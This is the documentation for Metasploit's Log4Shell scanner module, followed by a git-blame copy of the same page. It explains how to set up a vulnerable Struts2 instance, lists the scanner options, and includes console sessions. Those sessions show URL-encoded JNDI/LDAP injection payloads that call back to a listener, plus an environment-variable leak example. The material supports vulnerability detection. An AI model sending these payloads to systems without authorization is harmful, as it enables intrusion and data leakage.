documentation/modules/auxiliary/scanner/http/log4shell_scanner.md

## Vulnerable Application
This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
HTTP headers and the HTTP request path. URI paths for common, known-vulnerable applications are included
in the `data/exploits/CVE-2021-44228/http_uris.txt` data file.

This module has been successfully tested with:

* Apache Solr
* Apache Struts2
* Spring Boot
* VMWare VCenter

## Verification Steps

1. Setup a vulnerable Struts2 instance (see the steps below)
2. Start msfconsole
3. Do: `use auxiliary/scanner/http/log4shell_scanner`
4. Set the `SRVHOST`, `RHOSTS`, `RPORT` and `TARGETURI` options
    * For Struts2, set `TARGETURI` to `/struts2-showcase/`
5. Do: `run`
6. The target should be identified as vulnerable

### Apache Struts2 Setup

The following docker file can be used to setup a vulnerable Struts2 instance for testing.

```
#
# To build the image:
#   docker build . -t struts2:2.5.28
# To run the container:
#   docker run --name struts2 --rm -p 8080:8080 struts2:2.5.28
#

ARG version=2.5.28
FROM bitnami/tomcat:9.0
USER root
ENV TOMCAT_PASSWORD password

RUN apt-get update && \
	apt-get -y install unzip && \
	apt-get clean && \
	rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*

RUN curl https://archive.apache.org/dist/struts/2.5.28/struts-2.5.28-all.zip > struts-all.zip && \
	unzip struts-all.zip && \
	cp /struts-2.5.28/apps/struts2-showcase.war /bitnami/tomcat/webapps/
```

## Options

### HTTP_METHOD
The HTTP method to use.

### HEADERS_FILE
File containing headers to check, one per line. Lines starting with `#` will be treated as comments.

### URIS_FILE
File containing additional URIs to check, one per line. These values will be appended to the `TARGETURI` option. Lines 
starting with `#` will be treated as comments. Lines may also contain the string `${jndi:uri}` which will be used as the
injection point. This enables query parameters to be included in the request which are required for certain
applications.

### LEAK_PARAMS
Additional parameters to leak, separated by the `^` character. For example the following would leak the USER and PATH
environment variables: `${env:USER}^${env:PATH}`. See the [Log4j Lookups][log4j-lookups] wiki page for more information
on available parameters.

### LDAP_TIMEOUT
Time in seconds to wait to receive LDAP connections.

## Scenarios

### Apache Struts2

```
msf6 > use auxiliary/scanner/http/log4shell_scanner 
msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128
SRVHOST => 192.168.159.128
msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/
TARGETURI => /struts2-showcase/
msf6 auxiliary(scanner/http/log4shell_scanner) > run

[*] Started service listener on 192.168.159.128:389 
[+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/log4shell_scanner) > 

```

### Apache Solr

Apache Solr is trivially exploitable by a remote and unauthenticated attacker when in its default configuration:

```
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245

[*] Started service listener on 10.9.4.245:389
[+] 10.10.235.209:8983    - Log4Shell found via /solr/admin/cores?action=CREATE&wt=json&name=%24%7bjndi%3aldap%3a/10.9.4.245%3a389/vslscuy7m6q9pgfc18h/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d (java: Oracle Corporation_1.8.0_181)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Auxiliary module execution completed
```

[log4j-lookups]: https://logging.apache.org/log4j/2.x/manual/lookups.html
Add module docs and validate SRVHOST is usable 2021-12-14 17:37:33 -05:00			`## Vulnerable Application`
			`This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will`
			`trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying`
			`instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include`
Update log4shell documentation and default uri file wordlist for scanning 2021-12-16 17:33:54 +00:00			`HTTP headers and the HTTP request path. URI paths for common, known-vulnerable applications are included`
Address PR feedback from module hacking 2021-12-16 11:12:11 -05:00			in the `data/exploits/CVE-2021-44228/http_uris.txt` data file.
Add module docs and validate SRVHOST is usable 2021-12-14 17:37:33 -05:00
Allow templatized URIs 2021-12-15 11:58:41 -05:00			`This module has been successfully tested with:`
Add VMWare VCenter Log4Shell scan support 2021-12-15 14:05:25 -05:00
Allow templatized URIs 2021-12-15 11:58:41 -05:00			`* Apache Solr`
			`* Apache Struts2`
			`* Spring Boot`
Add VMWare VCenter Log4Shell scan support 2021-12-15 14:05:25 -05:00			`* VMWare VCenter`
Add module docs and validate SRVHOST is usable 2021-12-14 17:37:33 -05:00
			`## Verification Steps`

Address PR feedback from module hacking 2021-12-16 11:12:11 -05:00			`1. Setup a vulnerable Struts2 instance (see the steps below)`
Add module docs and validate SRVHOST is usable 2021-12-14 17:37:33 -05:00			`2. Start msfconsole`
			3. Do: `use auxiliary/scanner/http/log4shell_scanner`
			4. Set the `SRVHOST`, `RHOSTS`, `RPORT` and `TARGETURI` options
			* For Struts2, set `TARGETURI` to `/struts2-showcase/`
			5. Do: `run`
			`6. The target should be identified as vulnerable`

Update Log4Shell references and VCenter URI 2021-12-17 15:53:54 -05:00			`### Apache Struts2 Setup`
Add module docs and validate SRVHOST is usable 2021-12-14 17:37:33 -05:00
			`The following docker file can be used to setup a vulnerable Struts2 instance for testing.`

			```
			`#`
			`# To build the image:`
			`# docker build . -t struts2:2.5.28`
			`# To run the container:`
			`# docker run --name struts2 --rm -p 8080:8080 struts2:2.5.28`
			`#`

			`ARG version=2.5.28`
			`FROM bitnami/tomcat:9.0`
			`USER root`
			`ENV TOMCAT_PASSWORD password`

			`RUN apt-get update && \`
			`apt-get -y install unzip && \`
			`apt-get clean && \`
			`rm -rf /var/lib/apt/lists/* /tmp/* /var/tmp/*`

Update the URL to the archive for struts2 2022-01-28 16:17:48 -05:00			`RUN curl https://archive.apache.org/dist/struts/2.5.28/struts-2.5.28-all.zip > struts-all.zip && \`
Add module docs and validate SRVHOST is usable 2021-12-14 17:37:33 -05:00			`unzip struts-all.zip && \`
			`cp /struts-2.5.28/apps/struts2-showcase.war /bitnami/tomcat/webapps/`
			```

Add a TIMEOUT option and fix reading lines 2021-12-15 10:47:29 -05:00			`## Options`

			`### HTTP_METHOD`
			`The HTTP method to use.`

			`### HEADERS_FILE`
			File containing headers to check, one per line. Lines starting with `#` will be treated as comments.

			`### URIS_FILE`
Allow templatized URIs 2021-12-15 11:58:41 -05:00			File containing additional URIs to check, one per line. These values will be appended to the `TARGETURI` option. Lines
			starting with `#` will be treated as comments. Lines may also contain the string `${jndi:uri}` which will be used as the
			`injection point. This enables query parameters to be included in the request which are required for certain`
Add VMWare VCenter Log4Shell scan support 2021-12-15 14:05:25 -05:00			`applications.`
Add a TIMEOUT option and fix reading lines 2021-12-15 10:47:29 -05:00
Update the docs to include LEAK_PARAMS 2022-04-05 17:52:11 -04:00			`### LEAK_PARAMS`
Fix a misspelling 2022-04-06 09:04:26 -04:00			Additional parameters to leak, separated by the `^` character. For example the following would leak the USER and PATH
Update the docs for readability 2022-04-06 08:58:09 -04:00			environment variables: `${env:USER}^${env:PATH}`. See the [Log4j Lookups][log4j-lookups] wiki page for more information
			`on available parameters.`
Update the docs to include LEAK_PARAMS 2022-04-05 17:52:11 -04:00
Address PR feedback from module hacking 2021-12-16 11:12:11 -05:00			`### LDAP_TIMEOUT`
			`Time in seconds to wait to receive LDAP connections.`
Add a TIMEOUT option and fix reading lines 2021-12-15 10:47:29 -05:00
Add module docs and validate SRVHOST is usable 2021-12-14 17:37:33 -05:00			`## Scenarios`

Update Log4Shell references and VCenter URI 2021-12-17 15:53:54 -05:00			`### Apache Struts2`
Add module docs and validate SRVHOST is usable 2021-12-14 17:37:33 -05:00
			```
			`msf6 > use auxiliary/scanner/http/log4shell_scanner`
			`msf6 auxiliary(scanner/http/log4shell_scanner) > set RHOSTS 192.168.159.128`
			`RHOSTS => 192.168.159.128`
			`msf6 auxiliary(scanner/http/log4shell_scanner) > set SRVHOST 192.168.159.128`
			`SRVHOST => 192.168.159.128`
			`msf6 auxiliary(scanner/http/log4shell_scanner) > set RPORT 8080`
			`RPORT => 8080`
			`msf6 auxiliary(scanner/http/log4shell_scanner) > set TARGETURI /struts2-showcase/`
			`TARGETURI => /struts2-showcase/`
			`msf6 auxiliary(scanner/http/log4shell_scanner) > run`

			`[*] Started service listener on 192.168.159.128:389`
			`[+] Log4Shell found via /struts2-showcase/%24%7bjndi%3aldap%3a%24%7b%3a%3a-/%7d/192.168.159.128%3a389/r7yol50kgg7be/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d/ (java: BellSoft_11.0.13)`
			`[*] Scanned 1 of 1 hosts (100% complete)`
			`[*] Auxiliary module execution completed`
			`msf6 auxiliary(scanner/http/log4shell_scanner) >`

			```
Update log4shell documentation and default uri file wordlist for scanning 2021-12-16 17:33:54 +00:00
			`### Apache Solr`

			`Apache Solr is trivially exploitable by a remote and unauthenticated attacker when in its default configuration:`

			```
			`msf6 > use auxiliary/scanner/http/log4shell_scanner`
			`msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245`

			`[*] Started service listener on 10.9.4.245:389`
			`[+] 10.10.235.209:8983 - Log4Shell found via /solr/admin/cores?action=CREATE&wt=json&name=%24%7bjndi%3aldap%3a/10.9.4.245%3a389/vslscuy7m6q9pgfc18h/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d (java: Oracle Corporation_1.8.0_181)`
			`[*] Scanned 1 of 1 hosts (100% complete)`
			`[*] Sleeping 30 seconds for any last LDAP connections`
			`[*] Auxiliary module execution completed`
			```
Update the docs for readability 2022-04-06 08:58:09 -04:00
			`[log4j-lookups]: https://logging.apache.org/log4j/2.x/manual/lookups.html`